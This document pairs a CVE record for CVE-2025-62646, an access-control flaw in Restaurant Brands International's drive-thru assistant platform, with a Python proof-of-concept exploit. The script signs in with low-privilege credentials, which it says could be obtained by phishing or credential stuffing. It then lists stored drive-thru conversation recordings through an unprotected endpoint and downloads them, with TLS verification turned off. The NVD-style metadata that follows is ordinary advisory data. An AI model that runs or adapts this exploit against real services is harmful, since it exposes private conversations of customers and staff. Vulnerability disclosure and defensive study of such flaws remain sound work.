CVE-2025-62646

# CVE-2025-62646 PoC - RBI Assistant Platform Audio Data Exposure # This PoC demonstrates how an attacker with low-level credentials # can access stored drive-thru conversation recordings import requests import json # Target RBI Assistant Platform API endpoint BASE_URL = "https://[target-rbi-platform]/api/v1" # Step 1: Authenticate with low-privilege credentials def authenticate(username, password): """ Authenticate to the RBI Assistant Platform using low-privilege credentials """ auth_endpoint = f"{BASE_URL}/auth/login" payload = { "username": username, "password": password } response = requests.post(auth_endpoint, json=payload, verify=False) if response.status_code == 200: return response.json().get("access_token") return None # Step 2: List available audio recordings (improper access control) def list_audio_recordings(token): """ Exploit improper access control to list stored drive-thru audio recordings """ headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # The endpoint lacks proper authorization checks recordings_endpoint = f"{BASE_URL}/recordings/drive-thru" params = { "limit": 100, "offset": 0, "date_from": "2025-01-01", "date_to": "2025-09-06" } response = requests.get(recordings_endpoint, headers=headers, params=params, verify=False) if response.status_code == 200: return response.json() return None # Step 3: Download specific audio recording def download_recording(token, recording_id): """ Download a specific drive-thru conversation recording """ headers = { "Authorization": f"Bearer {token}" } download_endpoint = f"{BASE_URL}/recordings/{recording_id}/audio" response = requests.get(download_endpoint, headers=headers, verify=False) if response.status_code == 200: filename = f"drive_thru_recording_{recording_id}.wav" with open(filename, "wb") as f: f.write(response.content) print(f"[*] Recording saved: {filename}") return True return False # Main exploitation chain if __name__ == "__main__": # Low-privilege credentials (could be obtained through phishing, credential stuffing, etc.) USERNAME = "associate_user" PASSWORD = "weak_password_123" print("[*] CVE-2025-62646 - RBI Assistant Platform Audio Data Exposure PoC") print("[*] Authenticating with low-privilege credentials...") token = authenticate(USERNAME, PASSWORD) if token: print("[+] Authentication successful") print("[*] Fetching available drive-thru recordings...") recordings = list_audio_recordings(token) if recordings: print(f"[+] Found {len(recordings)} accessible recordings") # Download first 5 recordings as demonstration for recording in recordings[:5]: rec_id = recording.get("id") download_recording(token, rec_id) else: print("[-] No recordings found or access denied") else: print("[-] Authentication failed")

{"cve": {"id": "CVE-2025-62646", "sourceIdentifier": "[email protected]", "published": "2025-10-17T21:15:37.657", "lastModified": "2025-10-31T18:36:44.913", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The Restaurant Brands International (RBI) assistant platform through 2025-09-06 allows remote attackers to review the stored audio of conversations between associates and Drive Thru customers."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-669"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rbi:restaurant_brands_international_assistant:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-09-06", "matchCriteriaId": "706D04A1-2EDB-4713-BA47-EFDC8A86FBA3"}]}]}], "references": [{"url": "https://archive.today/fMYQp", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://bobdahacker.com/blog/rbi-hacked-drive-thrus/", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://web.archive.org/web/20250906134240/https:/bobdahacker.com/blog/rbi-hacked-drive-thrus", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.malwarebytes.com/blog/news/2025/09/popeyes-tim-hortons-burger-king-platforms-have-catastrophic-vulnerabilities-say-hackers", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://www.yahoo.com/news/articles/burger-king-hacked-attackers-impressed-124154038.html", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}]}}